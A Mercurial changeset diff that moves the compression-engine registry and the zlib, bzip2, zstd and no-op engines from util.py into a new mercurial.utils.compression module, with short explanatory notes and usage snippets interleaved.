util: extract compression code in `mercurial.utils.compression`...
Author: marmoute
Changeset: r42208:3e47d1ec (default branch)
@@ -82,6 +82,7 @@ from . import (
 )
 from .utils import (
     cborutil,
+    compression,
     dateutil,
     procutil,
     stringutil,
@@ -1299,7 +1300,8 @@ def debuginstall(ui, **opts):
              fm.formatlist(sorted(e.name() for e in compengines
                                   if e.available()),
                            name='compengine', fmt='%s', sep=', '))
-    wirecompengines = util.compengines.supportedwireengines(util.SERVERROLE)
+    wirecompengines = compression.compengines.supportedwireengines(
+        compression.SERVERROLE)
     fm.write('compenginesserver', _('checking available compression engines '
                                     'for wire protocol (%s)\n'),
              fm.formatlist([e.name() for e in wirecompengines
@@ -37,6 +37,9 b' from . import ('
37 from .hgweb import (
37 from .hgweb import (
38 webcommands,
38 webcommands,
39 )
39 )
40 from .utils import (
41 compression,
42 )
40
43
41 _exclkeywords = {
44 _exclkeywords = {
42 "(ADVANCED)",
45 "(ADVANCED)",
@@ -428,7 +431,7 @@ def addtopicsymbols(topic, marker, symbo
     addtopichook(topic, add)

 addtopicsymbols('bundlespec', '.. bundlecompressionmarker',
-                util.bundlecompressiontopics())
+                compression.bundlecompressiontopics())
 addtopicsymbols('filesets', '.. predicatesmarker', fileset.symbols)
 addtopicsymbols('merge-tools', '.. internaltoolsmarker',
                 filemerge.internalsdoc)
This diff has been collapsed as it changes many lines (716 lines changed).
@@ -16,7 +16,6 @@ hide platform-specific details from the
 from __future__ import absolute_import, print_function

 import abc
-import bz2
 import collections
 import contextlib
 import errno
@@ -34,7 +33,6 @@ import sys
 import time
 import traceback
 import warnings
-import zlib

 from .thirdparty import (
     attr,
@@ -50,6 +48,7 @@ from . import (
     urllibcompat,
 )
 from .utils import (
+    compression,
     procutil,
     stringutil,
 )
@@ -127,6 +126,11 @@ umask = platform.umask
 unlink = platform.unlink
 username = platform.username

+# small compat layer
+compengines = compression.compengines
+SERVERROLE = compression.SERVERROLE
+CLIENTROLE = compression.CLIENTROLE
+
 try:
     recvfds = osutil.recvfds
 except AttributeError:
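The three forwarded names form a small compatibility shim: existing callers of `util.compengines` keep working while new code imports `mercurial.utils.compression` directly. A minimal sketch of the invariant this guarantees (assuming a checkout of this revision on `sys.path`):

    # Both access paths resolve to the same registry object, so engines
    # registered through one are visible through the other.
    from mercurial import util
    from mercurial.utils import compression

    assert util.compengines is compression.compengines
    assert util.SERVERROLE == compression.SERVERROLE == 'server'
    assert util.CLIENTROLE == compression.CLIENTROLE == 'client'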
@@ -3206,714 +3210,6 @@ def finddirs(path):
         yield path[:pos]
         pos = path.rfind('/', 0, pos)

3209 # compression code
3210
3211 SERVERROLE = 'server'
3212 CLIENTROLE = 'client'
3213
3214 compewireprotosupport = collections.namedtuple(r'compenginewireprotosupport',
3215 (r'name', r'serverpriority',
3216 r'clientpriority'))
3217
3218 class compressormanager(object):
3219 """Holds registrations of various compression engines.
3220
3221 This class essentially abstracts the differences between compression
3222 engines to allow new compression formats to be added easily, possibly from
3223 extensions.
3224
3225 Compressors are registered against the global instance by calling its
3226 ``register()`` method.
3227 """
3228 def __init__(self):
3229 self._engines = {}
3230 # Bundle spec human name to engine name.
3231 self._bundlenames = {}
3232 # Internal bundle identifier to engine name.
3233 self._bundletypes = {}
3234 # Revlog header to engine name.
3235 self._revlogheaders = {}
3236 # Wire proto identifier to engine name.
3237 self._wiretypes = {}
3238
3239 def __getitem__(self, key):
3240 return self._engines[key]
3241
3242 def __contains__(self, key):
3243 return key in self._engines
3244
3245 def __iter__(self):
3246 return iter(self._engines.keys())
3247
3248 def register(self, engine):
3249 """Register a compression engine with the manager.
3250
3251 The argument must be a ``compressionengine`` instance.
3252 """
3253 if not isinstance(engine, compressionengine):
3254 raise ValueError(_('argument must be a compressionengine'))
3255
3256 name = engine.name()
3257
3258 if name in self._engines:
3259 raise error.Abort(_('compression engine %s already registered') %
3260 name)
3261
3262 bundleinfo = engine.bundletype()
3263 if bundleinfo:
3264 bundlename, bundletype = bundleinfo
3265
3266 if bundlename in self._bundlenames:
3267 raise error.Abort(_('bundle name %s already registered') %
3268 bundlename)
3269 if bundletype in self._bundletypes:
3270 raise error.Abort(_('bundle type %s already registered by %s') %
3271 (bundletype, self._bundletypes[bundletype]))
3272
3273 # No external facing name declared.
3274 if bundlename:
3275 self._bundlenames[bundlename] = name
3276
3277 self._bundletypes[bundletype] = name
3278
3279 wiresupport = engine.wireprotosupport()
3280 if wiresupport:
3281 wiretype = wiresupport.name
3282 if wiretype in self._wiretypes:
3283 raise error.Abort(_('wire protocol compression %s already '
3284 'registered by %s') %
3285 (wiretype, self._wiretypes[wiretype]))
3286
3287 self._wiretypes[wiretype] = name
3288
3289 revlogheader = engine.revlogheader()
3290 if revlogheader and revlogheader in self._revlogheaders:
3291 raise error.Abort(_('revlog header %s already registered by %s') %
3292 (revlogheader, self._revlogheaders[revlogheader]))
3293
3294 if revlogheader:
3295 self._revlogheaders[revlogheader] = name
3296
3297 self._engines[name] = engine
3298
3299 @property
3300 def supportedbundlenames(self):
3301 return set(self._bundlenames.keys())
3302
3303 @property
3304 def supportedbundletypes(self):
3305 return set(self._bundletypes.keys())
3306
3307 def forbundlename(self, bundlename):
3308 """Obtain a compression engine registered to a bundle name.
3309
3310 Will raise KeyError if the bundle type isn't registered.
3311
3312 Will abort if the engine is known but not available.
3313 """
3314 engine = self._engines[self._bundlenames[bundlename]]
3315 if not engine.available():
3316 raise error.Abort(_('compression engine %s could not be loaded') %
3317 engine.name())
3318 return engine
3319
3320 def forbundletype(self, bundletype):
3321 """Obtain a compression engine registered to a bundle type.
3322
3323 Will raise KeyError if the bundle type isn't registered.
3324
3325 Will abort if the engine is known but not available.
3326 """
3327 engine = self._engines[self._bundletypes[bundletype]]
3328 if not engine.available():
3329 raise error.Abort(_('compression engine %s could not be loaded') %
3330 engine.name())
3331 return engine
3332
3333 def supportedwireengines(self, role, onlyavailable=True):
3334 """Obtain compression engines that support the wire protocol.
3335
3336 Returns a list of engines in prioritized order, most desired first.
3337
3338 If ``onlyavailable`` is set, filter out engines that can't be
3339 loaded.
3340 """
3341 assert role in (SERVERROLE, CLIENTROLE)
3342
3343 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3344
3345 engines = [self._engines[e] for e in self._wiretypes.values()]
3346 if onlyavailable:
3347 engines = [e for e in engines if e.available()]
3348
3349 def getkey(e):
3350 # Sort first by priority, highest first. In case of tie, sort
3351 # alphabetically. This is arbitrary, but ensures output is
3352 # stable.
3353 w = e.wireprotosupport()
3354 return -1 * getattr(w, attr), w.name
3355
3356 return list(sorted(engines, key=getkey))
3357
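The sort key deserves a concrete illustration: priority descends, and names break ties so the ordering is deterministic. A standalone sketch using the server priorities the engines below actually declare (zlib 20, none 0, zstd 50):

    import collections

    support = collections.namedtuple('support',
                                     'name serverpriority clientpriority')
    engines = [support('zlib', 20, 20),
               support('none', 0, 10),
               support('zstd', 50, 50)]

    # Same rule as getkey() above: highest priority first, then name.
    ordered = sorted(engines, key=lambda w: (-1 * w.serverpriority, w.name))
    assert [w.name for w in ordered] == ['zstd', 'zlib', 'none']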
3358 def forwiretype(self, wiretype):
3359 engine = self._engines[self._wiretypes[wiretype]]
3360 if not engine.available():
3361 raise error.Abort(_('compression engine %s could not be loaded') %
3362 engine.name())
3363 return engine
3364
3365 def forrevlogheader(self, header):
3366 """Obtain a compression engine registered to a revlog header.
3367
3368 Will raise KeyError if the revlog header value isn't registered.
3369 """
3370 return self._engines[self._revlogheaders[header]]
3371
3372 compengines = compressormanager()
3373
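To make the registry concrete, here is a hedged sketch of the lookup side (engine names match those registered later in this module; whether `zstd` loads depends on the optional bundled module):

    from mercurial.utils import compression

    mgr = compression.compengines
    print(sorted(mgr))                       # iterates registered engine names
    print(sorted(mgr.supportedbundlenames))  # ['bzip2', 'gzip', 'none', 'zstd']

    gzipengine = mgr.forbundlename('gzip')   # aborts if the engine cannot load
    assert gzipengine.name() == 'zlib'       # bundle name 'gzip' maps to zlib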
3374 class compressionengine(object):
3375 """Base class for compression engines.
3376
3377 Compression engines must implement the interface defined by this class.
3378 """
3379 def name(self):
3380 """Returns the name of the compression engine.
3381
3382 This is the key the engine is registered under.
3383
3384 This method must be implemented.
3385 """
3386 raise NotImplementedError()
3387
3388 def available(self):
3389 """Whether the compression engine is available.
3390
3391 The intent of this method is to allow optional compression engines
3392 that may not be available in all installations (such as engines relying
3393 on C extensions that may not be present).
3394 """
3395 return True
3396
3397 def bundletype(self):
3398 """Describes bundle identifiers for this engine.
3399
3400 If this compression engine isn't supported for bundles, returns None.
3401
3402 If this engine can be used for bundles, returns a 2-tuple of strings of
3403 the user-facing "bundle spec" compression name and an internal
3404 identifier used to denote the compression format within bundles. To
3405 exclude the name from external usage, set the first element to ``None``.
3406
3407 If bundle compression is supported, the class must also implement
3408 ``compressstream`` and ``decompressorreader``.
3409
3410 The docstring of this method is used in the help system to tell users
3411 about this engine.
3412 """
3413 return None
3414
3415 def wireprotosupport(self):
3416 """Declare support for this compression format on the wire protocol.
3417
3418 If this compression engine isn't supported for compressing wire
3419 protocol payloads, returns None.
3420
3421 Otherwise, returns ``compenginewireprotosupport`` with the following
3422 fields:
3423
3424 * String format identifier
3425 * Integer priority for the server
3426 * Integer priority for the client
3427
3428 The integer priorities are used to order the advertisement of format
3429 support by server and client. The highest integer is advertised
3430 first. Integers with non-positive values aren't advertised.
3431
3432 The priority values are somewhat arbitrary and only used for default
3433 ordering. The relative order can be changed via config options.
3434
3435 If wire protocol compression is supported, the class must also implement
3436 ``compressstream`` and ``decompressorreader``.
3437 """
3438 return None
3439
3440 def revlogheader(self):
3441 """Header added to revlog chunks that identifies this engine.
3442
3443 If this engine can be used to compress revlogs, this method should
3444 return the bytes used to identify chunks compressed with this engine.
3445 Else, the method should return ``None`` to indicate it does not
3446 participate in revlog compression.
3447 """
3448 return None
3449
3450 def compressstream(self, it, opts=None):
3451 """Compress an iterator of chunks.
3452
3453 The method receives an iterator (ideally a generator) of chunks of
3454 bytes to be compressed. It returns an iterator (ideally a generator)
3455 of bytes of chunks representing the compressed output.
3456
3457 Optionally accepts an argument defining how to perform compression.
3458 Each engine treats this argument differently.
3459 """
3460 raise NotImplementedError()
3461
3462 def decompressorreader(self, fh):
3463 """Perform decompression on a file object.
3464
3465 Argument is an object with a ``read(size)`` method that returns
3466 compressed data. Return value is an object with a ``read(size)`` that
3467 returns uncompressed data.
3468 """
3469 raise NotImplementedError()
3470
3471 def revlogcompressor(self, opts=None):
3472 """Obtain an object that can be used to compress revlog entries.
3473
3474 The object has a ``compress(data)`` method that compresses binary
3475 data. This method returns compressed binary data or ``None`` if
3476 the data could not be compressed (too small, not compressible, etc).
3477 The returned data should have a header uniquely identifying this
3478 compression format so decompression can be routed to this engine.
3479 This header should be identified by the ``revlogheader()`` return
3480 value.
3481
3482 The object has a ``decompress(data)`` method that decompresses
3483 data. The method will only be called if ``data`` begins with
3484 ``revlogheader()``. The method should return the raw, uncompressed
3485 data or raise a ``StorageError``.
3486
3487 The object is reusable but is not thread safe.
3488 """
3489 raise NotImplementedError()
3490
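Putting the interface together, a minimal hypothetical engine might look like the sketch below ('identity' is an invented name used only for illustration; the real engines follow later in this file):

    from mercurial.utils import compression

    class identityengine(compression.compressionengine):
        """Illustration only: pass data through unmodified."""
        def name(self):
            return 'identity'
        def bundletype(self):
            """Hypothetical no-op bundle compression."""
            return 'identity', 'ID'
        def compressstream(self, it, opts=None):
            return it
        def decompressorreader(self, fh):
            return fh

    compression.compengines.register(identityengine())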
3491 class _CompressedStreamReader(object):
3492 def __init__(self, fh):
3493 if safehasattr(fh, 'unbufferedread'):
3494 self._reader = fh.unbufferedread
3495 else:
3496 self._reader = fh.read
3497 self._pending = []
3498 self._pos = 0
3499 self._eof = False
3500
3501 def _decompress(self, chunk):
3502 raise NotImplementedError()
3503
3504 def read(self, l):
3505 buf = []
3506 while True:
3507 while self._pending:
3508 if len(self._pending[0]) > l + self._pos:
3509 newbuf = self._pending[0]
3510 buf.append(newbuf[self._pos:self._pos + l])
3511 self._pos += l
3512 return ''.join(buf)
3513
3514 newbuf = self._pending.pop(0)
3515 if self._pos:
3516 buf.append(newbuf[self._pos:])
3517 l -= len(newbuf) - self._pos
3518 else:
3519 buf.append(newbuf)
3520 l -= len(newbuf)
3521 self._pos = 0
3522
3523 if self._eof:
3524 return ''.join(buf)
3525 chunk = self._reader(65536)
3526 self._decompress(chunk)
3527 if not chunk and not self._pending and not self._eof:
3528 # No progress and no new data, bail out
3529 return ''.join(buf)
3530
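These readers adapt a push-style decompressor to a plain `read(n)` interface. A usage sketch (Python 2 era string semantics, as in the surrounding code), feeding a zlib stream through the zlib engine's `decompressorreader()`:

    import io
    import zlib
    from mercurial.utils import compression

    payload = zlib.compress(b'compressed wire payload ' * 64)
    engine = compression.compengines['zlib']
    reader = engine.decompressorreader(io.BytesIO(payload))

    # read(n) returns decompressed bytes, pulling 64k compressed
    # chunks from the underlying file object on demand.
    assert reader.read(10) == b'compressed'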
3531 class _GzipCompressedStreamReader(_CompressedStreamReader):
3532 def __init__(self, fh):
3533 super(_GzipCompressedStreamReader, self).__init__(fh)
3534 self._decompobj = zlib.decompressobj()
3535 def _decompress(self, chunk):
3536 newbuf = self._decompobj.decompress(chunk)
3537 if newbuf:
3538 self._pending.append(newbuf)
3539 d = self._decompobj.copy()
3540 try:
3541 d.decompress('x')
3542 d.flush()
3543 if d.unused_data == 'x':
3544 self._eof = True
3545 except zlib.error:
3546 pass
3547
3548 class _BZ2CompressedStreamReader(_CompressedStreamReader):
3549 def __init__(self, fh):
3550 super(_BZ2CompressedStreamReader, self).__init__(fh)
3551 self._decompobj = bz2.BZ2Decompressor()
3552 def _decompress(self, chunk):
3553 newbuf = self._decompobj.decompress(chunk)
3554 if newbuf:
3555 self._pending.append(newbuf)
3556 try:
3557 while True:
3558 newbuf = self._decompobj.decompress('')
3559 if newbuf:
3560 self._pending.append(newbuf)
3561 else:
3562 break
3563 except EOFError:
3564 self._eof = True
3565
3566 class _TruncatedBZ2CompressedStreamReader(_BZ2CompressedStreamReader):
3567 def __init__(self, fh):
3568 super(_TruncatedBZ2CompressedStreamReader, self).__init__(fh)
3569 newbuf = self._decompobj.decompress('BZ')
3570 if newbuf:
3571 self._pending.append(newbuf)
3572
3573 class _ZstdCompressedStreamReader(_CompressedStreamReader):
3574 def __init__(self, fh, zstd):
3575 super(_ZstdCompressedStreamReader, self).__init__(fh)
3576 self._zstd = zstd
3577 self._decompobj = zstd.ZstdDecompressor().decompressobj()
3578 def _decompress(self, chunk):
3579 newbuf = self._decompobj.decompress(chunk)
3580 if newbuf:
3581 self._pending.append(newbuf)
3582 try:
3583 while True:
3584 newbuf = self._decompobj.decompress('')
3585 if newbuf:
3586 self._pending.append(newbuf)
3587 else:
3588 break
3589 except self._zstd.ZstdError:
3590 self._eof = True
3591
3592 class _zlibengine(compressionengine):
3593 def name(self):
3594 return 'zlib'
3595
3596 def bundletype(self):
3597 """zlib compression using the DEFLATE algorithm.
3598
3599 All Mercurial clients should support this format. The compression
3600 algorithm strikes a reasonable balance between compression ratio
3601 and size.
3602 """
3603 return 'gzip', 'GZ'
3604
3605 def wireprotosupport(self):
3606 return compewireprotosupport('zlib', 20, 20)
3607
3608 def revlogheader(self):
3609 return 'x'
3610
3611 def compressstream(self, it, opts=None):
3612 opts = opts or {}
3613
3614 z = zlib.compressobj(opts.get('level', -1))
3615 for chunk in it:
3616 data = z.compress(chunk)
3617 # Not all calls to compress emit data. It is cheaper to inspect
3618 # here than to feed empty chunks through the generator.
3619 if data:
3620 yield data
3621
3622 yield z.flush()
3623
3624 def decompressorreader(self, fh):
3625 return _GzipCompressedStreamReader(fh)
3626
3627 class zlibrevlogcompressor(object):
3628 def compress(self, data):
3629 insize = len(data)
3630 # Caller handles empty input case.
3631 assert insize > 0
3632
3633 if insize < 44:
3634 return None
3635
3636 elif insize <= 1000000:
3637 compressed = zlib.compress(data)
3638 if len(compressed) < insize:
3639 return compressed
3640 return None
3641
3642 # zlib makes an internal copy of the input buffer, doubling
3643 # memory usage for large inputs. So do streaming compression
3644 # on large inputs.
3645 else:
3646 z = zlib.compressobj()
3647 parts = []
3648 pos = 0
3649 while pos < insize:
3650 pos2 = pos + 2**20
3651 parts.append(z.compress(data[pos:pos2]))
3652 pos = pos2
3653 parts.append(z.flush())
3654
3655 if sum(map(len, parts)) < insize:
3656 return ''.join(parts)
3657 return None
3658
3659 def decompress(self, data):
3660 try:
3661 return zlib.decompress(data)
3662 except zlib.error as e:
3663 raise error.StorageError(_('revlog decompress error: %s') %
3664 stringutil.forcebytestr(e))
3665
3666 def revlogcompressor(self, opts=None):
3667 return self.zlibrevlogcompressor()
3668
3669 compengines.register(_zlibengine())
3670
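`compressstream()` keeps everything chunk-oriented, which is what lets bundle writing stay streaming. A small sketch with the zlib engine just registered (`opts` is engine-specific; zlib honors 'level'):

    import zlib
    from mercurial.utils import compression

    chunks = [b'chunk one|', b'chunk two|', b'chunk three']
    engine = compression.compengines['zlib']

    # Iterator in, iterator out; joining yields one complete zlib stream.
    out = b''.join(engine.compressstream(iter(chunks), {'level': 6}))
    assert zlib.decompress(out) == b''.join(chunks)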
3671 class _bz2engine(compressionengine):
3672 def name(self):
3673 return 'bz2'
3674
3675 def bundletype(self):
3676 """An algorithm that produces smaller bundles than ``gzip``.
3677
3678 All Mercurial clients should support this format.
3679
3680 This engine will likely produce smaller bundles than ``gzip`` but
3681 will be significantly slower, both during compression and
3682 decompression.
3683
3684 If available, the ``zstd`` engine can yield similar or better
3685 compression at much higher speeds.
3686 """
3687 return 'bzip2', 'BZ'
3688
3689 # We declare a protocol name but don't advertise by default because
3690 # it is slow.
3691 def wireprotosupport(self):
3692 return compewireprotosupport('bzip2', 0, 0)
3693
3694 def compressstream(self, it, opts=None):
3695 opts = opts or {}
3696 z = bz2.BZ2Compressor(opts.get('level', 9))
3697 for chunk in it:
3698 data = z.compress(chunk)
3699 if data:
3700 yield data
3701
3702 yield z.flush()
3703
3704 def decompressorreader(self, fh):
3705 return _BZ2CompressedStreamReader(fh)
3706
3707 compengines.register(_bz2engine())
3708
3709 class _truncatedbz2engine(compressionengine):
3710 def name(self):
3711 return 'bz2truncated'
3712
3713 def bundletype(self):
3714 return None, '_truncatedBZ'
3715
3716 # We don't implement compressstream because it is hackily handled elsewhere.
3717
3718 def decompressorreader(self, fh):
3719 return _TruncatedBZ2CompressedStreamReader(fh)
3720
3721 compengines.register(_truncatedbz2engine())
3722
3723 class _noopengine(compressionengine):
3724 def name(self):
3725 return 'none'
3726
3727 def bundletype(self):
3728 """No compression is performed.
3729
3730 Use this compression engine to explicitly disable compression.
3731 """
3732 return 'none', 'UN'
3733
3734 # Clients always support uncompressed payloads. Servers don't because
3735 # unless you are on a fast network, uncompressed payloads can easily
3736 # saturate your network pipe.
3737 def wireprotosupport(self):
3738 return compewireprotosupport('none', 0, 10)
3739
3740 # We don't implement revlogheader because it is handled specially
3741 # in the revlog class.
3742
3743 def compressstream(self, it, opts=None):
3744 return it
3745
3746 def decompressorreader(self, fh):
3747 return fh
3748
3749 class nooprevlogcompressor(object):
3750 def compress(self, data):
3751 return None
3752
3753 def revlogcompressor(self, opts=None):
3754 return self.nooprevlogcompressor()
3755
3756 compengines.register(_noopengine())
3757
3758 class _zstdengine(compressionengine):
3759 def name(self):
3760 return 'zstd'
3761
3762 @propertycache
3763 def _module(self):
3764 # Not all installs have the zstd module available. So defer importing
3765 # until first access.
3766 try:
3767 from . import zstd
3768 # Force delayed import.
3769 zstd.__version__
3770 return zstd
3771 except ImportError:
3772 return None
3773
3774 def available(self):
3775 return bool(self._module)
3776
3777 def bundletype(self):
3778 """A modern compression algorithm that is fast and highly flexible.
3779
3780 Only supported by Mercurial 4.1 and newer clients.
3781
3782 With the default settings, zstd compression is both faster and yields
3783 better compression than ``gzip``. It also frequently yields better
3784 compression than ``bzip2`` while operating at much higher speeds.
3785
3786 If this engine is available and backwards compatibility is not a
3787 concern, it is likely the best available engine.
3788 """
3789 return 'zstd', 'ZS'
3790
3791 def wireprotosupport(self):
3792 return compewireprotosupport('zstd', 50, 50)
3793
3794 def revlogheader(self):
3795 return '\x28'
3796
3797 def compressstream(self, it, opts=None):
3798 opts = opts or {}
3799 # zstd level 3 is almost always significantly faster than zlib
3800 # while providing no worse compression. It strikes a good balance
3801 # between speed and compression.
3802 level = opts.get('level', 3)
3803
3804 zstd = self._module
3805 z = zstd.ZstdCompressor(level=level).compressobj()
3806 for chunk in it:
3807 data = z.compress(chunk)
3808 if data:
3809 yield data
3810
3811 yield z.flush()
3812
3813 def decompressorreader(self, fh):
3814 return _ZstdCompressedStreamReader(fh, self._module)
3815
3816 class zstdrevlogcompressor(object):
3817 def __init__(self, zstd, level=3):
3818 # TODO consider omitting frame magic to save 4 bytes.
3819 # This writes content sizes into the frame header. That is
3820 # extra storage. But it allows a correct size memory allocation
3821 # to hold the result.
3822 self._cctx = zstd.ZstdCompressor(level=level)
3823 self._dctx = zstd.ZstdDecompressor()
3824 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3825 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3826
3827 def compress(self, data):
3828 insize = len(data)
3829 # Caller handles empty input case.
3830 assert insize > 0
3831
3832 if insize < 50:
3833 return None
3834
3835 elif insize <= 1000000:
3836 compressed = self._cctx.compress(data)
3837 if len(compressed) < insize:
3838 return compressed
3839 return None
3840 else:
3841 z = self._cctx.compressobj()
3842 chunks = []
3843 pos = 0
3844 while pos < insize:
3845 pos2 = pos + self._compinsize
3846 chunk = z.compress(data[pos:pos2])
3847 if chunk:
3848 chunks.append(chunk)
3849 pos = pos2
3850 chunks.append(z.flush())
3851
3852 if sum(map(len, chunks)) < insize:
3853 return ''.join(chunks)
3854 return None
3855
3856 def decompress(self, data):
3857 insize = len(data)
3858
3859 try:
3860 # This was measured to be faster than other streaming
3861 # decompressors.
3862 dobj = self._dctx.decompressobj()
3863 chunks = []
3864 pos = 0
3865 while pos < insize:
3866 pos2 = pos + self._decompinsize
3867 chunk = dobj.decompress(data[pos:pos2])
3868 if chunk:
3869 chunks.append(chunk)
3870 pos = pos2
3871 # Frame should be exhausted, so no finish() API.
3872
3873 return ''.join(chunks)
3874 except Exception as e:
3875 raise error.StorageError(_('revlog decompress error: %s') %
3876 stringutil.forcebytestr(e))
3877
3878 def revlogcompressor(self, opts=None):
3879 opts = opts or {}
3880 return self.zstdrevlogcompressor(self._module,
3881 level=opts.get('level', 3))
3882
3883 compengines.register(_zstdengine())
3884
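The revlog compressor contract in brief: `compress()` may decline (returning `None`) when compression would not pay for itself, and `decompress()` must round-trip what `compress()` produced. A guarded sketch, since the bundled `zstd` module is optional:

    from mercurial.utils import compression

    engine = compression.compengines['zstd']
    if engine.available():
        c = engine.revlogcompressor()
        data = b'revlog chunk ' * 512      # comfortably above the 50-byte floor
        packed = c.compress(data)          # None when compression won't help
        if packed is not None:
            assert c.decompress(packed) == data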
3885 def bundlecompressiontopics():
3886 """Obtains a list of available bundle compressions for use in help."""
3887 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3888 items = {}
3889
3890 # We need to format the docstring. So use a dummy object/type to hold it
3891 # rather than mutating the original.
3892 class docobject(object):
3893 pass
3894
3895 for name in compengines:
3896 engine = compengines[name]
3897
3898 if not engine.available():
3899 continue
3900
3901 bt = engine.bundletype()
3902 if not bt or not bt[0]:
3903 continue
3904
3905 doc = b'``%s``\n %s' % (bt[0], pycompat.getdoc(engine.bundletype))
3906
3907 value = docobject()
3908 value.__doc__ = pycompat.sysstr(doc)
3909 value._origdoc = engine.bundletype.__doc__
3910 value._origfunc = engine.bundletype
3911
3912 items[bt[0]] = value
3913
3914 return items
3915
3916 i18nfunctions = bundlecompressiontopics().values()

 # convenient shortcut
 dst = debugstacktrace
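The help system thus receives a mapping of bundle-spec names to objects whose docstrings come from each engine's `bundletype()`. Roughly (a sketch; 'zstd' appears only when its module loads):

    from mercurial.utils import compression

    topics = compression.bundlecompressiontopics()
    print(sorted(topics))                          # e.g. ['bzip2', 'gzip', 'none', ...]
    print(topics['gzip'].__doc__.splitlines()[0])  # '``gzip``'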
This diff has been collapsed as it changes many lines (3296 lines changed).
@@ -1,1555 +1,37 @@
-# util.py - Mercurial utility functions and platform specific implementations
+# compression.py - Mercurial utility functions for compression
-#
-# Copyright 2005 K. Thananchayan <thananck@yahoo.com>
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
-# Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
 #
 # This software may be used and distributed according to the terms of the
 # GNU General Public License version 2 or any later version.

-"""Mercurial utility functions and platform specific implementations.
-
-This contains helper routines that are independent of the SCM core and
-hide platform-specific details from the core.
-"""

 from __future__ import absolute_import, print_function

-import abc
 import bz2
 import collections
-import contextlib
-import errno
-import gc
-import hashlib
-import itertools
-import mmap
-import os
-import platform as pyplatform
-import re as remod
-import shutil
-import socket
-import stat
-import sys
-import time
-import traceback
-import warnings
 import zlib

-from .thirdparty import (
+from .. import (
-    attr,
-)
-from hgdemandimport import tracing
-from . import (
-    encoding,
     error,
     i18n,
-    node as nodemod,
-    policy,
     pycompat,
-    urllibcompat,
 )
-from .utils import (
+from . import (
-    procutil,
     stringutil,
 )

-base85 = policy.importmod(r'base85')
+safehasattr = pycompat.safehasattr
-osutil = policy.importmod(r'osutil')
-parsers = policy.importmod(r'parsers')
-
-b85decode = base85.b85decode
-b85encode = base85.b85encode

-cookielib = pycompat.cookielib
-httplib = pycompat.httplib
-pickle = pycompat.pickle
-safehasattr = pycompat.safehasattr
-socketserver = pycompat.socketserver
-bytesio = pycompat.bytesio
-# TODO deprecate stringio name, as it is a lie on Python 3.
-stringio = bytesio
-xmlrpclib = pycompat.xmlrpclib
-
-httpserver = urllibcompat.httpserver
-urlerr = urllibcompat.urlerr
-urlreq = urllibcompat.urlreq
-
-# workaround for win32mbcs
-_filenamebytestr = pycompat.bytestr
-
-if pycompat.iswindows:
-    from . import windows as platform
-else:
-    from . import posix as platform

 _ = i18n._

-bindunixsocket = platform.bindunixsocket
+# compression code
89 cachestat = platform.cachestat
90 checkexec = platform.checkexec
91 checklink = platform.checklink
92 copymode = platform.copymode
93 expandglobs = platform.expandglobs
94 getfsmountpoint = platform.getfsmountpoint
95 getfstype = platform.getfstype
96 groupmembers = platform.groupmembers
97 groupname = platform.groupname
98 isexec = platform.isexec
99 isowner = platform.isowner
100 listdir = osutil.listdir
101 localpath = platform.localpath
102 lookupreg = platform.lookupreg
103 makedir = platform.makedir
104 nlinks = platform.nlinks
105 normpath = platform.normpath
106 normcase = platform.normcase
107 normcasespec = platform.normcasespec
108 normcasefallback = platform.normcasefallback
109 openhardlinks = platform.openhardlinks
110 oslink = platform.oslink
111 parsepatchoutput = platform.parsepatchoutput
112 pconvert = platform.pconvert
113 poll = platform.poll
114 posixfile = platform.posixfile
115 readlink = platform.readlink
116 rename = platform.rename
117 removedirs = platform.removedirs
118 samedevice = platform.samedevice
119 samefile = platform.samefile
120 samestat = platform.samestat
121 setflags = platform.setflags
122 split = platform.split
123 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
124 statisexec = platform.statisexec
125 statislink = platform.statislink
126 umask = platform.umask
127 unlink = platform.unlink
128 username = platform.username
129
130 try:
131 recvfds = osutil.recvfds
132 except AttributeError:
133 pass
134
135 # Python compatibility
136
137 _notset = object()
138
139 def bitsfrom(container):
140 bits = 0
141 for bit in container:
142 bits |= bit
143 return bits
144
145 # python 2.6 still has deprecation warnings enabled by default. We do not want
146 # to display anything to standard users, so detect if we are running tests and
147 # only use python deprecation warnings in this case.
148 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
149 if _dowarn:
150 # explicitly unfilter our warning for python 2.7
151 #
152 # The option of setting PYTHONWARNINGS in the test runner was investigated.
153 # However, module name set through PYTHONWARNINGS was exactly matched, so
154 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
155 # makes the whole PYTHONWARNINGS thing useless for our usecase.
156 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
157 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
158 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
159 if _dowarn and pycompat.ispy3:
160 # silence warning emitted by passing user string to re.sub()
161 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
162 r'mercurial')
163 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
164 DeprecationWarning, r'mercurial')
165 # TODO: reinvent imp.is_frozen()
166 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
167 DeprecationWarning, r'mercurial')
168
169 def nouideprecwarn(msg, version, stacklevel=1):
170 """Issue an python native deprecation warning
171
172 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
173 """
174 if _dowarn:
175 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
176 " update your code.)") % version
177 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
178
179 DIGESTS = {
180 'md5': hashlib.md5,
181 'sha1': hashlib.sha1,
182 'sha512': hashlib.sha512,
183 }
184 # List of digest types from strongest to weakest
185 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
186
187 for k in DIGESTS_BY_STRENGTH:
188 assert k in DIGESTS
189
190 class digester(object):
191 """helper to compute digests.
192
193 This helper can be used to compute one or more digests given their name.
194
195 >>> d = digester([b'md5', b'sha1'])
196 >>> d.update(b'foo')
197 >>> [k for k in sorted(d)]
198 ['md5', 'sha1']
199 >>> d[b'md5']
200 'acbd18db4cc2f85cedef654fccc4a4d8'
201 >>> d[b'sha1']
